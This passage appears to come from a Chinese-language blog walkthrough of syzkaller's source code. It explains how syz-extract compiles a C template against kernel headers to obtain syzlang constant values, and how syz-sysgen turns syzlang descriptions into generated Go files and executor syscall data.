字段 res.fileConsts 包含了 syzlang 文件名与其用到的常量数组的映射，以及其所 include 的头文件数组的映射；这些东西都将会用到获取 consts 对应的具体整数操作中。

而 extractor.prepareArch 函数在 linux.go 中，做的操作主要是定义了几个头文件：

"stdarg.h": `
#pragma once
#define va_list __builtin_va_list
#define va_start __builtin_va_start
#define va_end __builtin_va_end
#define va_arg __builtin_va_arg
#define va_copy __builtin_va_copy
#define __va_copy __builtin_va_copy
`,

"asm/a.out.h":    "",
"asm/prctl.h":    "",
"asm/mce.h":      "",
"uapi/asm/msr.h": "",

因为某些 arch 的 kernel src 可能会缺失这些文件，需要自己手动补全。补全之后 extractor.prepareArch 会重新执行一次 linux kernel make 生成。

回到 processArch 函数，该函数最后会把先前获取到的 consts info 返回给调用者：

6. processFile

processFile 函数只是 extractor.processFile 的 wrapper，主要是做了一些 check 操作：

func processFile(extractor Extractor, arch *Arch, file *File) (map[string]uint64, map[string]bool, error) {
    inname := filepath.Join("sys", arch.target.OS, file.name)
    if file.info == nil {
        return nil, nil, fmt.Errorf("const info for input file %v is missing", inname)
    }
    if len(file.info.Consts) == 0 {
        return nil, nil, nil
    }
    return extractor.processFile(arch, file.info)
}

实际用于查找 const 值的操作位于 extractor.processFile：

1	func (linux) processFile(arch Arch, info *compiler.ConstInfo) (map[string]uint64, map[string]bool, error)

在 linux.go 中，processFile 初始时先过滤掉不满足条件的情况：

// Kiprey: in function processFile of sys/syz-extract/linux.go
if strings.HasSuffix(info.File, "_kvm.txt") &&
    (arch.target.Arch == targets.ARM || arch.target.Arch == targets.RiscV64) {
    // Hack: KVM is not supported on ARM anymore. We may want some more official support
    // for marking descriptions arch-specific, but so far this combination is the only
    // one. For riscv64, KVM is not supported yet but might be in the future.
    // Note: syz-sysgen also ignores this file for arm and riscv64.
    return nil, nil, nil
}

之后，生成编译代码模板所要用到的 gcc 编译参数：

// Kiprey: in function processFile of sys/syz-extract/linux.go
headerArch := arch.target.KernelHeaderArch
sourceDir := arch.sourceDir
buildDir := arch.buildDir
args := []string{
    // This makes the build completely hermetic, only kernel headers are used.
    "-nostdinc",
    "-w", "-fmessage-length=0",
    "-O3", // required to get expected values for some __builtin_constant_p
    "-I.",
    "-D__KERNEL__",
    "-DKBUILD_MODNAME=\"-\"",
    "-I" + sourceDir + "/arch/" + headerArch + "/include",
    "-I" + buildDir + "/arch/" + headerArch + "/include/generated/uapi",
    "-I" + buildDir + "/arch/" + headerArch + "/include/generated",
    "-I" + sourceDir + "/arch/" + headerArch + "/include/asm/mach-malta",
    "-I" + sourceDir + "/arch/" + headerArch + "/include/asm/mach-generic",
    "-I" + buildDir + "/include",
    "-I" + sourceDir + "/include",
    "-I" + sourceDir + "/arch/" + headerArch + "/include/uapi",
    "-I" + buildDir + "/arch/" + headerArch + "/include/generated/uapi",
    "-I" + sourceDir + "/include/uapi",
    "-I" + buildDir + "/include/generated/uapi",
    "-I" + sourceDir,
    "-I" + sourceDir + "/include/linux",
    "-I" + buildDir + "/syzkaller",
    "-include", sourceDir + "/include/linux/kconfig.h",
}
args = append(args, arch.target.CFlags...)
for _, incdir := range info.Incdirs {
    args = append(args, "-I"+sourceDir+"/"+incdir)
}
if arch.includeDirs != "" {
    for _, dir := range strings.Split(arch.includeDirs, ",") {
        args = append(args, "-I"+dir)
    }
}

参数有亿点点多：

在准备好参数之后，processFile 还准备了 extract 参数，以及待使用的 CC 编译器，之后执行更加核心的 extract 函数，生成出 res 映射和 undeclared 集合：

// Kiprey: in function processFile of sys/syz-extract/linux.go
params := &extractParams{
    AddSource:      "#include ",
    ExtractFromELF: true,
    TargetEndian:   arch.target.HostEndian,
}
cc := arch.target.CCompiler
res, undeclared, err := extract(info, cc, args, params)
if err != nil {
    return nil, nil, err
}

其中，res 是 const 字符串与整型的映射；undeclared 是未声明 const 字符串与 bool 值的映射，通常这里的 bool 值都为 true：

undeclared 所对应的常量将在 .const 文件中标明其值为 ???
例如：
1
2
O_RDWR = 2
MyConst = ???

执行完成 extract 函数后，如果当前架构为 32 位，则 syz-extract 需要使用 mmap2 来替换 mmap，以避免一些可能的错误：

if arch.target.PtrSize == 4 {
    // mmap syscall on i386/arm is translated to old_mmap and has different signature.
    // As a workaround fix it up to mmap2, which has signature that we expect.
    // pkg/csource has the same hack.
    const mmap = "__NR_mmap"
    const mmap2 = "__NR_mmap2"
    if res[mmap] != 0 || undeclared[mmap] {
        if res[mmap2] == 0 {
            return nil, nil, fmt.Errorf("%v is missing", mmap2)
        }
        res[mmap] = res[mmap2]
        delete(undeclared, mmap)
    }
}

替换完成后将结果返回：

1	return res, undeclared, nil

以上内容便是 extractor.processFile 的源码解释，接下来我们深入一下 extract 函数。

7. extract

函数代码位于 sys/syz-extract/fetch.go

该函数调用编译器来编译代码模板，并根据编译出的二进制文件来获取 consts 常量整数。若编译过程出错，则会尝试自动纠错。

函数声明：

1 2	func extract(info compiler.ConstInfo, cc string, args []string, params extractParams) map[string]uint64, map[string]bool, error)

其中参数 Info 便是单个文件存放 const 数据的结构体，cc 是编译器名称字符串，args 是编译器执行参数，params 是用于 extract 执行过程用的选项：

初始时，extract 函数声明一系列的 map：

// Kiprey: in function `extract`
data := &CompileData{
    extractParams: params,
    Defines:       info.Defines,
    Includes:      info.Includes,
    Values:        info.Consts,
}
// 编译生成的程序路径
bin := ""
// 这个字段貌似没有用途，先行忽略
missingIncludes := make(map[string]bool)
// 未定义的 const，通常是自己定义的常量
undeclared := make(map[string]bool)
// 声明并初始化 valMap 中各个元素为 true
valMap := make(map[string]bool)
for _, val := range info.Consts {
    valMap[val] = true
}

接下来便是尝试将 consts 常量字符串与模板C代码结合，并编译结合后的代码，形成一个可执行文件。编译操作由 compile 函数完成，其返回结果分别为编译出的可执行文件路径；编译器标准输出信息；编译器标准错误信息：

// Kiprey: in function `extract`
for {
    bin1, out, err := compile(cc, args, data)
    if err == nil {
        bin = bin1
        break
    }
    ...
}

我们先深入进 compile 函数看看，该函数非常的简单，因此将笔记内联进代码中：

func compile(cc string, args []string, data *CompileData) (string, []byte, error) {
    // 创建填充好后的 C 代码缓冲区
    src := new(bytes.Buffer)
    // 使用传入的 data 对代码模板 srcTemplate 进行填充
    if err := srcTemplate.Execute(src, data); err != nil {
        return "", nil, fmt.Errorf("failed to generate source: %v", err)
    }
    // 创建一个临时可执行文件路径
    binFile, err := osutil.TempFile("syz-extract-bin")
    if err != nil {
        return "", nil, err
    }
    // 为编译器添加额外的参数
    args = append(args, []string{
        // -x c ：指定代码语言为 C 语言
        // - ：指定代码从标准输入而不是从文件中读取
        "-x", "c", "-",
        // 指定文件输出的路径
        "-o", binFile,
        "-w",
    }...)
    if data.ExtractFromELF {
        // gcc -c 参数：只编译但不链接
        // 由于我们测试时使用的是 Linux，因此会进入该分支
        args = append(args, "-c")
    }
    // 执行程序
    cmd := osutil.Command(cc, args...)
    // 将填充后的代码模板喂给 gcc 编译
    cmd.Stdin = src
    // 将 stdin 和 stdout 的输入糅合，使得他俩的输出完全一致
    // 通俗的说就是让 stdin 和 stdout 都指向同一个管道
    if out, err := cmd.CombinedOutput(); err != nil {
        os.Remove(binFile)
        return "", out, err
    }
    return binFile, nil, nil
}

执行至该函数入口时，其参数示例如下：

现在我们看看是什么样的代码模板：

var srcTemplate = template.Must(template.New("").Parse(`
{{if not .ExtractFromELF}}
#define __asm__(...)
{{end}}

{{if .DefineGlibcUse}}
#ifndef __GLIBC_USE
#    define __GLIBC_USE(X) 0
#endif
{{end}}

{{range $incl := $.Includes}}
#include <{{$incl}}>
{{end}}

{{range $name, $val := $.Defines}}
#ifndef {{$name}}
#    define {{$name}} {{$val}}
#endif
{{end}}

{{.AddSource}}

{{if .DeclarePrintf}}
int printf(const char *format, ...);
{{end}}

{{if .ExtractFromELF}}
__attribute__((section("syz_extract_data")))
unsigned long long vals[] = {
    {{range $val := $.Values}}(unsigned long long){{$val}},
    {{end}}
};
{{else}}
int main() {
    int i;
    unsigned long long vals[] = {
        {{range $val := $.Values}}(unsigned long long){{$val}},
        {{end}}
    };
    for (i = 0; i < sizeof(vals)/sizeof(vals[0]); i++) {
        if (i != 0)
            printf(" ");
        printf("%llu", vals[i]);
    }
    return 0;
}
{{end}}
`))

可以很容易的看出来，该模板会将先前从 syzlang 收集到的 include、define 和 consts 字符串全部融合：

如果设置了 ExtractFromELF 标志位，则 consts 值将全部放置在一个名为 syz_extract_data 的 section 上
如果没有设置该标志位，则编译出来的程序在执行时将会依次打印 consts 值，以 %llu 的输出格式&使用空格来区分每个变量，输出至 stdout中。这样，sys-extract 就可以通过分析所编译程序的输出，来确定每个 consts 字符串所对应的数值是多少。

回到 extract 函数，由于编写 syzlang 时极易出问题，因此 syz-extract 需要尝试自动纠错：

// Kiprey: in function `extract`
for {
    bin1, out, err := compile(cc, args, data)
    if err == nil {
        bin = bin1
        break
    }
    // Some consts and syscall numbers are not defined on some archs.
    // Figure out from compiler output undefined consts,
    // and try to compile again without them.
    // May need to try multiple times because some severe errors terminate compilation.
    tryAgain := false
    // 遍历所有预先定义的错误信息，并使用正则表达式匹配
    for _, errMsg := range []string{
        `error: [‘']([a-zA-Z0-9_]+)[’'] undeclared`,
        `note: in expansion of macro [‘']([a-zA-Z0-9_]+)[’']`,
        `note: expanded from macro [‘']([a-zA-Z0-9_]+)[’']`,
        `error: use of undeclared identifier [‘']([a-zA-Z0-9_]+)[’']`,
    } {
        re := regexp.MustCompile(errMsg)
        matches := re.FindAllSubmatch(out, -1)
        // 如果匹配到了，则将出问题的常量取出至 undeclared 中
        for _, match := range matches {
            val := string(match[1])
            if valMap[val] && !undeclared[val] {
                undeclared[val] = true
                tryAgain = true
            }
        }
    }
    if !tryAgain {
        return nil, nil, fmt.Errorf("failed to run compiler: %v %v\n%v\n%s",
                                    cc, args, err, out)
    }
    // 重置编译用的 consts 数组
    data.Values = nil
    // 将出错的 consts 剔除，并将剩余没出错的 consts 存入编译用的 consts 数组
    for _, v := range info.Consts {
        if undeclared[v] {
            continue
        }
        data.Values = append(data.Values, v)
    }
    // 这部分代码没咋看懂，因为 data.Includes 没有被重置，没必要重复添加
    data.Includes = nil
    for _, v := range info.Includes {
        // missingIncludes 没有初始化，因此是个一直为空的变量
        if missingIncludes[v] {
            continue
        }
        data.Includes = append(data.Includes, v)
    }
}

之后便是从编译出的二进制文件中读取数值，解析并返回：

注意：虽然 syz-extract 立即对编译出的二进制文件执行 remove 操作，但由于 syz-extract 仍然持有该文件的文件描述符，因此该文件将不会立即被删除，而是等到 syz-extract 释放了该文件的文件描述符后才会被删除。

// 将新编译出的二进制文件删除
defer os.Remove(bin)

var flagVals []uint64
var err error
if data.ExtractFromELF {
    flagVals, err = extractFromELF(bin, params.TargetEndian)
} else {
    flagVals, err = extractFromExecutable(bin)
}
if err != nil {
    return nil, nil, err
}
if len(flagVals) != len(data.Values) {
    return nil, nil, fmt.Errorf("fetched wrong number of values %v, want != %v",
                                len(flagVals), len(data.Values))
}
res := make(map[string]uint64)
for i, name := range data.Values {
    res[name] = flagVals[i]
}
return res, undeclared, nil

操作二进制文件的代码主要是这几行：

if data.ExtractFromELF {
    flagVals, err = extractFromELF(bin, params.TargetEndian)
} else {
    flagVals, err = extractFromExecutable(bin)
}

若 ExtractFromELF 字段为 false，则 sys-extract 会走下面这个分支，执行函数 extractFromExecutable。该函数将实际执行目标程序，解析其输出并转换为整型数组：

func extractFromExecutable(binFile string) ([]uint64, error) {
    out, err := osutil.Command(binFile).CombinedOutput()
    if err != nil {
        return nil, fmt.Errorf("failed to run flags binary: %v\n%s", err, out)
    }
    if len(out) == 0 {
        return nil, nil
    }
    var vals []uint64
    for _, val := range strings.Split(string(out), " ") {
        n, err := strconv.ParseUint(val, 10, 64)
        if err != nil {
            return nil, fmt.Errorf("failed to parse value: %v (%v)", err, val)
        }
        vals = append(vals, n)
    }
    return vals, nil
}

但由于 OS 为 Linux 时，其 ExtractFromELF 标志为 true，因此会执行 extractFromELF 函数。在该函数中， syz-extract 将不会实际执行程序，而是从 ELF 文件中一个名为 syz_extract_data 的 section 中读取常量值：

而且也执行不起来，因为先前手动不让二进制文件执行 link 操作，还没 main 函数。

func extractFromELF(binFile string, targetEndian binary.ByteOrder) ([]uint64, error) {
    f, err := os.Open(binFile)
    if err != nil {
        return nil, err
    }
    ef, err := elf.NewFile(f)
    if err != nil {
        return nil, err
    }
    for _, sec := range ef.Sections {
        if sec.Name != "syz_extract_data" {
            continue
        }
        data, err := ioutil.ReadAll(sec.Open())
        if err != nil {
            return nil, err
        }
        vals := make([]uint64, len(data)/8)
        if err := binary.Read(bytes.NewReader(data), targetEndian, &vals); err != nil {
            return nil, err
        }
        return vals, nil
    }
    return nil, fmt.Errorf("did not find syz_extract_data section")
}

这样做的目的貌似是为了提高常量读取速度，因为读取文件远比执行程序来的快。

8. 小结

syz-extract 会调用自定义 compiler 解析 syzlang 为 ast 森林，并依次提取每个 ast 树上的 consts 节点，然后将这些 consts 节点上的字符串放置进模板中，编译模板生成一个 ELF 或其他可执行文件。

接下来 syz-extract 会分析 ELF 文件上的数据，或者尝试执行可执行文件来解析其输出，以获得各个 consts 字符串所对应的具体整型值。

最后 syz-extract 将获取到的 consts 字符串与具体整型的映射关系，一个个序列化并填入 .const 文件中，这样便生成了对应于每个 syzlang 文件的 .const 文件。

在 syz-extract 执行的整个过程中，syz-extract 另起一个 go routine 来执行 worker，是为了能达到边进行常量提取，边将先前已有的提取结果存放进文件中，这样做是为了提高效率，加快常量提取的速度。

调试用的 vscode launch.json 文件：

{
    "version": "0.2.0",
    "configurations": [
        {
            "name": "syzextractLaunch",
            "type": "go",
            "request": "launch",
            "mode": "auto",
            "program": "${fileDirname}",
            "env": {},
            "cwd": "/usr/class/syzkaller",
            "args": ["-sourcedir", "/usr/class/linux", "-arch", "amd64"] 
        }
    ]
}

三、syz-sysgen

代码位于 sys/syz-sysgen/sysgen.go 中。

syz-gen 用于解析人工编写的 syzlang 代码文件，并将其 syzlang 内部定义的 syscall 类型信息转换成后续 syzkaller 能够使用的数据结构。

在理解了 syz-extract 的代码后，syz-sysgen 的代码相对来说也比较好理解，接下来我们先从 main 函数开始看起。

1. main

首先是将所有 OS 的类型都取出来，并且创建了用于存储结果的结构体：

// Kiprey：in Function main
defer tool.Init()()

var OSList []string
for OS := range targets.List {
    OSList = append(OSList, OS)
}
sort.Strings(OSList)

data := &ExecutorData{}

其中第一行的 golang defer 关键字表示，defer 后面的函数将在整个函数正常返回时被执行。由于 tool.Init() 涉及到命令行中 CPU/Mem 分析，不在我们的考虑范畴，因此忽略不看。

完成这段代码的执行后，其变量情况如下图所示：

紧接着便是一个 for 循环，遍历 OSList 中的每个 OS 字符串，并解析其中的 syzlang 代码。我将这个 for 循环分为了上中下三个部分：

首先是第一部分：

// Kiprey：in Function main
for _, OS := range OSList {
    descriptions := ast.ParseGlob(filepath.Join(*srcDir, "sys", OS, "*.txt"), nil)
    if descriptions == nil {
        os.Exit(1)
    }
    constFile := compiler.DeserializeConstFile(filepath.Join(*srcDir, "sys", OS, "*.const"), nil)
    if constFile == nil {
        os.Exit(1)
    }
  osutil.MkdirAll(filepath.Join(*outDir, "sys", OS, "gen"))

    var archs []string
    for arch := range targets.List[OS] {
        archs = append(archs, arch)
    }
  sort.Strings(archs)

    ...
}

这部分内容较为简单，将当前遍历到的 OS 所对应的 sys//*.txt 和 sys//*.const文件，分别解析成 AST 树 (ast.Description 类型) 和 ConstFile 结构体。之后创建 sys//gen 文件夹，整个 syz-sysgen 的输出将存放在该文件夹下：

之后还是收集当前 OS 所对应的全部 arch 字符串集合，并做一次排序操作。

其次是第二部分：

// Kiprey：in Function main
for _, OS := range OSList {
    ...
    
    var jobs []*Job
    for _, arch := range archs {
        jobs = append(jobs, &Job{
            Target:      targets.List[OS][arch],
            Unsupported: make(map[string]bool),
        })
    }
    sort.Slice(jobs, func(i, j int) bool {
        return jobs[i].Target.Arch < jobs[j].Target.Arch
    })
    var wg sync.WaitGroup
    wg.Add(len(jobs))

    for _, job := range jobs {
        job := job
        go func() {
            defer wg.Done()
            processJob(job, descriptions, constFile)
        }()
    }
    wg.Wait()

    ...
}

首先是为每个 arch 都创建了一个 Job 结构体，将其添加进数组 jobs中，并为数组执行排序操作，其中排序规则是自定义的。

接下来创建了一个 sync.WaitGroup 结构体，这个结构体用于等待指定数量的 go routine 集合执行完成。其内部原理有点类似于信号量，执行 wg.Add 函数以增加其内部计数器值，执行 wg.Done 函数以减小其内部计数器值，执行 wg.Wait 则判断内部计数器值状态，进而选择是否挂起等待。

其中最重要的是，syz-sysgen 依次遍历 jobs 数组中的每个 job，并创建 go routine 并行执行这些 job。函数 processJob 用于编译先前 parse 的 syzlang AST、分析其中的类型信息与依赖关系，并将其序列化为 golang 代码至 sys//gen/.go 中，同时还将 syscall 属性相关的信息保存在 job.ArchData 中，供后续生成 sys-executor 关键头文件代码所用。

最后是第三部分：

// Kiprey：in Function main
for _, OS := range OSList {
    ...
    
    var syscallArchs []ArchData
    unsupported := make(map[string]int)
    for _, job := range jobs {
        if !job.OK {
            fmt.Printf("compilation of %v/%v target failed:\n", job.Target.OS, job.Target.Arch)
            for _, msg := range job.Errors {
                fmt.Print(msg)
            }
            os.Exit(1)
        }
        syscallArchs = append(syscallArchs, job.ArchData)
        for u := range job.Unsupported {
            unsupported[u]++
        }
    }
    data.OSes = append(data.OSes, OSData{
        GOOS:  OS,
        Archs: syscallArchs,
    })

    for what, count := range unsupported {
        if count == len(jobs) {
            tool.Failf("%v is unsupported on all arches (typo?)", what)
        }
    }
}

第三部分没什么需要特别关注的，这部分主要是做了一些检查，并将先前 worker 里生成的 ArchData 提取进变量 data 中。

for 循环结束后吗，main 函数最后这部分的代码继续为变量 data 设置一些字段：

attrs := reflect.TypeOf(prog.SyscallAttrs{})
for i := 0; i < attrs.NumField(); i++ {
    data.CallAttrs = append(data.CallAttrs, prog.CppName(attrs.Field(i).Name))
}

props := prog.CallProps{}
props.ForeachProp(func(name, _ string, value reflect.Value) {
    data.CallProps = append(data.CallProps, CallPropDescription{
        Type: value.Kind().String(),
        Name: prog.CppName(name),
    })
})

这部分代码乍看上去可能不太能理解，但仔细一看就能发现，它只是分别将 prog.SyscallAttrs 和 prog.CallProps 这两个结构体对应的字段名存了起来。俩结构体声明如下：

// SyscallAttrs represents call attributes in syzlang.
//
// This structure is the source of truth for the all other parts of the system.
// pkg/compiler uses this structure to parse descriptions.
// syz-sysgen uses this structure to generate code for executor.
//
// Only bool's and uint64's are currently supported.
//
// See docs/syscall_descriptions_syntax.md for description of individual attributes.
type SyscallAttrs struct {
    Disabled      bool
    Timeout       uint64
    ProgTimeout   uint64
    IgnoreReturn  bool
    BreaksReturns bool
}

// These properties are parsed and serialized according to the tag and the type
// of the corresponding fields.
// IMPORTANT: keep the exact values of "key" tag for existing props unchanged,
// otherwise the backwards compatibility would be broken.
type CallProps struct {
    FailNth int `key:"fail_nth"`
}

实际保存进变量 data 中的内容如下：

通过对上面源码的分析，我发现貌似 syz-sysgen 将整个 prog.SyscallAttrs 结构体的字段名和每个 syscall 所对应的数据，全都转换成了普通字符串型和整型。看上去这像是要用这些数据来填充 C 语言模板？我们接下来再来看看 writeExecutorSyscalls 函数，看看这里面具体是做了什么。

writeExecutorSyscalls 函数源码分析位于下文，这里不再赘述。

2. processJob

processJob 函数的主要功能是：编译传入的 syzlang AST，分析其中的 syscall 类型信息等，并反序列化为一个 golang 语法源码。

传入 processJob 的参数 job，其结构体声明如下所示：

type Job struct {
    Target      *targets.Target // 存放着一些关于特定 OS 特定 arch 的一些常量信息
    OK          bool
    Errors      []string        // 保存报错信息的字符串集合，一条字符串表示一行报错信息
    Unsupported map[string]bool // 存放不支持的 syscall 集合
    ArchData    ArchData        // 存放待从 worker routine 返回给 main 函数的数据
}

首先，该函数会生成一个 error handler，用于输出错误信息；之后从 ConstFile 结构体中，取出对应 arch 的 consts 字符串->整型映射表：

// Kiprey: in function `processJob`
eh := func(pos ast.Pos, msg string) {
    job.Errors = append(job.Errors, fmt.Sprintf("%v: %v\n", pos, msg))
}
consts := constFile.Arch(job.Target.Arch)
top := descriptions

之后，对于一些 Linux OS 需要特殊处理的架构，syz-sysgen 设置了过滤器，过滤掉那些文件名中带有 _kvm.txt 后缀的 syzlang，那些 syzlang 将不参与处理；并且将那些不支持的条目将会存放进 job.Unsupported 中，接下来的操作将跳过这些条目：

// Kiprey: in function `processJob`
if job.Target.OS == targets.Linux && (job.Target.Arch == targets.ARM || job.Target.Arch == targets.RiscV64) {
    // Hack: KVM is not supported on ARM anymore. On riscv64 it
    // is not supported yet but might be in the future.
    // Note: syz-extract also ignores this file for arm and riscv64.
    top = descriptions.Filter(func(n ast.Node) bool {
        pos, typ, name := n.Info()
        if !strings.HasSuffix(pos.File, "_kvm.txt") {
            return true
        }
        switch n.(type) {
            case *ast.Resource, *ast.Struct, *ast.Call, *ast.TypeDef:
            // Mimic what pkg/compiler would do with unsupported entries.
            // This is required to keep the unsupported diagnostic below working
            // for kvm entries, otherwise it will not think that kvm entries
            // are not supported on all architectures.
            job.Unsupported[typ+" "+name] = true
        }
        return false
    })
}

除了这些 Linux OS 需要过滤的架构以外，syz-sysgen 还需要过滤掉自己开发者人员测试用的 testOS：

// Kiprey: in function `processJob`
if job.Target.OS == targets.TestOS {
    constInfo := compiler.ExtractConsts(top, job.Target, eh)
    compiler.FabricateSyscallConsts(job.Target, constInfo, consts)
}

其中，targets.TestOS 所对应的字符串为 test。

接下来，syz-sysgen 需要分析 AST 信息，对 syzlang 进行编译：

// Kiprey: in function `processJob`
prog := compiler.Compile(top, consts, job.Target, eh)
if prog == nil {
    return
}
for what := range prog.Unsupported {
    job.Unsupported[what] = true
}

返回的 Prog 结构体声明如下：

// Kiprey: in function `processJob`
 
// Prog is description compilation result.
type Prog struct {
    Resources []*prog.ResourceDesc
    Syscalls  []*prog.Syscall
    Types     []prog.Type
    // Set of unsupported syscalls/flags.
    Unsupported map[string]bool
    // Returned if consts was nil.
    fileConsts map[string]*ConstInfo
}

编译操作和先前 syz-extract 类似，不同的是这次提供了 consts 信息，因此会执行完整的编译过程，分析 syzlang 代码中描述的全部 syscall 参数类型信息。返回的 Prog 结构体中：

字段 fileConsts 为空
涉及到的类型信息保存在了 Resource 和 Types 字段
syscall 的描述则存放在 Syscalls 字段中。

之后便是将分析结果，序列化为 go 语言源代码，留待后续 syz-fuzzer 所使用；序列化后的 golang 代码存放至 sys//gen/.go，例如 sys/linux/gen/amd64.go（loc: ~11w）：

// Kiprey: in function `processJob`
sysFile := filepath.Join(*outDir, "sys", job.Target.OS, "gen", job.Target.Arch+".go")
out := new(bytes.Buffer)
// generate 执行 golang 序列化操作
generate(job.Target, prog, consts, out)
rev := hash.String(out.Bytes())
fmt.Fprintf(out, "const revision_%v = %q\n", job.Target.Arch, rev)
writeSource(sysFile, out.Bytes())

我们来看看生成出的 golang 代码是什么样的（以 /sys/linux/gen/amd64.go 为例）：

// AUTOGENERATED FILE
// +build !codeanalysis
// +build !syz_target syz_target,syz_os_linux,syz_arch_amd64

package gen

import . "github.com/google/syzkaller/prog"
import . "github.com/google/syzkaller/sys/linux"

func init() {
    RegisterTarget(&Target{OS: "linux", Arch: "amd64", Revision: revision_amd64, PtrSize: 8, PageSize: 4096, NumPages: 4096, DataOffset: 536870912, LittleEndian: true, ExecutorUsesShmem: true, Syscalls: syscalls_amd64, Resources: resources_amd64, Consts: consts_amd64}, types_amd64, InitTarget)
}

var resources_amd64 = []*ResourceDesc{
{Name:"ANYRES16",Kind:[]string{"ANYRES16"},Values:[]uint64{18446744073709551615,0}},
{Name:"ANYRES32",Kind:[]string{"ANYRES32"},Values:[]uint64{18446744073709551615,0}},
{Name:"ANYRES64",Kind:[]string{"ANYRES64"},Values:[]uint64{18446744073709551615,0}},
{Name:"IMG_DEV_VIRTADDR",Kind:[]string{"IMG_DEV_VIRTADDR"},Values:[]uint64{0}},
{Name:"IMG_HANDLE",Kind:[]string{"IMG_HANDLE"},Values:[]uint64{0}},
{Name:"assoc_id",Kind:[]string{"assoc_id"},Values:[]uint64{0}},
....
}

var syscalls_amd64 = []*Syscall{
{NR:43,Name:"accept",CallName:"accept",Args:[]Field{
{Name:"fd",Type:Ref(11199)},
{Name:"peer",Type:Ref(10021)},
{Name:"peerlen",Type:Ref(10305)},
},Ret:Ref(11199)},
{NR:43,Name:"accept$alg",CallName:"accept",Args:[]Field{
{Name:"fd",Type:Ref(11202)},
{Name:"peer",Type:Ref(4943)},
{Name:"peerlen",Type:Ref(4943)},
},Ret:Ref(11203)},
{NR:43,Name:"accept$ax25",CallName:"accept",Args:[]Field{
{Name:"fd",Type:Ref(11204)},
{Name:"peer",Type:Ref(10033)},
{Name:"peerlen",Type:Ref(10305)},
},Ret:Ref(11204)},
{NR:43,Name:"accept$inet",CallName:"accept",Args:[]Field{
{Name:"fd",Type:Ref(11223)},
{Name:"peer",Type:Ref(10025)},
{Name:"peerlen",Type:Ref(10305)},
},Ret:Ref(11223)},
....
}

var types_amd64 = []Type{
&ArrayType{TypeCommon:TypeCommon{TypeName:"array",TypeAlign:1,IsVarlen:true},Elem:Ref(17155)},
&ArrayType{TypeCommon:TypeCommon{TypeName:"array",TypeAlign:1,IsVarlen:true},Elem:Ref(14707),Kind:1,RangeEnd:32},
&ArrayType{TypeCommon:TypeCommon{TypeName:"array",TypeAlign:1,IsVarlen:true},Elem:Ref(14707),Kind:1,RangeEnd:8},
&ArrayType{TypeCommon:TypeCommon{TypeName:"array",TypeAlign:1,IsVarlen:true},Elem:Ref(14560)},
&ArrayType{TypeCommon:TypeCommon{TypeName:"array",TypeAlign:1,IsVarlen:true},Elem:Ref(14575)},
....
}

var consts_amd64 = []ConstValue{
{"ABS_CNT",64},
{"ABS_MAX",63},
{"ACL_EXECUTE",1},
{"ACL_GROUP",8},
{"ACL_GROUP_OBJ",4},
{"ACL_LINK",1},
....
}

const revision_amd64 = "e61403f96ca19fc071d8e9c946b2259a2804c68e"

其中，init 函数用于将当前这个 linux amd64 的 target，注册进 targets 数组中以供后续 syz-fuzzer 取出使用。

var targets = make(map[string]*Target)

func RegisterTarget(target *Target, types []Type, initArch func(target *Target)) {
    key := target.OS + "/" + target.Arch
    if targets[key] != nil {
        panic(fmt.Sprintf("duplicate target %v", key))
    }
    target.initArch = initArch
    target.types = types
    targets[key] = target
}

amd64.go 内部还声明了多个数组，其中：

resources_amd64 数组：存放着每个 syzlang 代码中声明的 resource 变量
syscalls_amd64 数组：存放着每个 syscall 所对应的名称、调用号，以及各个参数的名称和类型。
types_amd64 数组：每个类型的具体信息，例如数组、结构体类型信息等等
consts_amd64：存放 consts 字符串与整型的映射关系
revision_amd64：amd64.go 源码的哈希值

回到 generateExecutorSyscall 函数，该函数最后便是调用 generateExecutorSyscalls 函数来创建 Executor 的 syscall 信息，并将其返回给上层调用者（即 main 函数）：

// Kiprey: in function `processJob`
job.ArchData = generateExecutorSyscalls(job.Target, prog.Syscalls, rev)
  
// Don't print warnings, they are printed in syz-check.
job.Errors = nil
job.OK = true

这个信息将用于生成 syz-exexcutor 的 C 代码。

3. generateExecutorSyscalls

该函数的作用是，为生成 syz-executor 准备相关的 syscall 数据，因此起名神似 生成（generate） executor 的 syscall 数据。

初始时，generateExecutorSyscalls 函数创建了一个 ArchData 结构体，这个结构体将一层层返回给 main 函数。

data := ArchData{
    Revision:   rev,
    GOARCH:     target.Arch,
    PageSize:   target.PageSize,
    NumPages:   target.NumPages,
    DataOffset: target.DataOffset,
}
if target.ExecutorUsesForkServer {
    data.ForkServer = 1
}
if target.ExecutorUsesShmem {
    data.Shmem = 1
}

如果目标 OS & arch 所对应的 target 结构体，设置了对 ForkServer 和 Shmem（共享内存）的支持，则在 data 中将这两个字段设置为 true，这样 syz-executor 便可以使用这两个技术加速 fuzz 过程。

// SyscallAttrs represents call attributes in syzlang.
//
// This structure is the source of truth for the all other parts of the system.
// pkg/compiler uses this structure to parse descriptions.
// syz-sysgen uses this structure to generate code for executor.
//
// Only bool's and uint64's are currently supported.
//
// See docs/syscall_descriptions_syntax.md for description of individual attributes.
type SyscallAttrs struct {
    Disabled      bool
    Timeout       uint64
    ProgTimeout   uint64
    IgnoreReturn  bool
    BreaksReturns bool
}

接下来便是一个遍历 syscalls 数组中的各个 Syscall 类型结构体的 for 循环。这个 for 循环虽然看上去一眼难以看懂，但实际上，它只是将变量 c 中结构体 SyscallAttrs 里的各个字段取出，并将其依次存放至整型数组 attrVals，然后再使用生成的 attrVals 数组进一步生成 SyscallData 结构体：

for _, c := range syscalls {
    var attrVals []uint64
    attrs := reflect.ValueOf(c.Attrs)
    last := -1
    for i := 0; i < attrs.NumField(); i++ {
        attr := attrs.Field(i)
        val := uint64(0)
        switch attr.Type().Kind() {
            case reflect.Bool:
            if attr.Bool() {
                val = 1
            }
            case reflect.Uint64:
            val = attr.Uint()
            default:
            panic("unsupported syscall attribute type")
        }
        attrVals = append(attrVals, val)
        if val != 0 {
            last = i
        }
    }
    data.Calls = append(data.Calls, newSyscallData(target, c, attrVals[:last+1]))
}
sort.Slice(data.Calls, func(i, j int) bool {
    return data.Calls[i].Name < data.Calls[j].Name
})
return data

以下是 data 变量中所存放信息的一个示例：

结构体 SyscallAttrs 定义如下：

// SyscallAttrs represents call attributes in syzlang.
//
// This structure is the source of truth for the all other parts of the system.
// pkg/compiler uses this structure to parse descriptions.
// syz-sysgen uses this structure to generate code for executor.
//
// Only bool's and uint64's are currently supported.
//
// See docs/syscall_descriptions_syntax.md for description of individual attributes.
type SyscallAttrs struct {
    Disabled      bool
    Timeout       uint64
    ProgTimeout   uint64
    IgnoreReturn  bool
    BreaksReturns bool
}

